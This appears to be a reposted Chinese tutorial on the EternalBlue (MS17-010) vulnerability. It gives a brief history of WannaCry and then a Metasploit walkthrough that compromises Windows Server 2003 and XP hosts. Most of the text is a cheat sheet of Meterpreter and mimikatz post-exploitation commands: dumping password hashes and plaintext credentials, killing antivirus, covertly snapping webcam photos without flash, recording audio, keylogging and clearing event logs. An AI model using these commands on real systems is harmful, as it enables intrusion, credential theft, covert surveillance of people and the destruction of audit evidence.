前言
即使过去两年了,但是国内还是有很多电脑没有修复。这个漏洞攻击成本低,危害巨大还是不容小觑的。
爆发
2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
经历过的朋友或许对这图不陌生
攻击过程
本次利用神器MSF演示
目前MSF下利用ms17-010模块:
本次主要exploit/windows/smb/ms17_010_psexec模块
启动msf
测试Microsoft(R) Windows(R) Server 2003, Enterprise Edition
设置如下
直接run
很轻松就拿下了这台03
测试Microsoft Windows XP Professional
一样很轻松
win10,win7就不测试了
试一试其它命令
命令
读wifi密码:bgrun post/windows/wlan/wlan_profile(失败进交互命令行执行netsh wlan show profiles)
读系统明文密码:wdigest (需加载mimikatz模块)
杀掉杀毒软件:bgrun killav
查看有没有摄像头:webcam_list
启动摄像头:bgrun webcam
启动摄像头拍摄一张照片但不打开闪光灯:webcam_snap -i 1 -v false
启动声音录制:bgrun sound_recorder
keyscan_start:开启键盘记录功能
keyscan_dump:显示捕捉到的键盘记录信息
keyscan_stop:停止键盘记录功能
获取密码哈希值:bgrun hashdump
meterpreter > load mimikatz #加载mimikatz
meterpreter > msv #获取hash值
meterpreter > kerberos #获取明文
meterpreter >ssp #获取明文信息
meterpreter > wdigest #获取系统账户信息
meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示
meterpreter >mimikatz_command -f hash:: #获取目标 hash
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
启动vnc连接:bgrun vnc
对目标系统桌面进行截屏:screenshot
清除操作日志:clearev
下载文件:download d:safe6.txt
上传文件:upload a.txt d:
显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息:sysinfo
执行命令:execute -f notepad.exe
上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。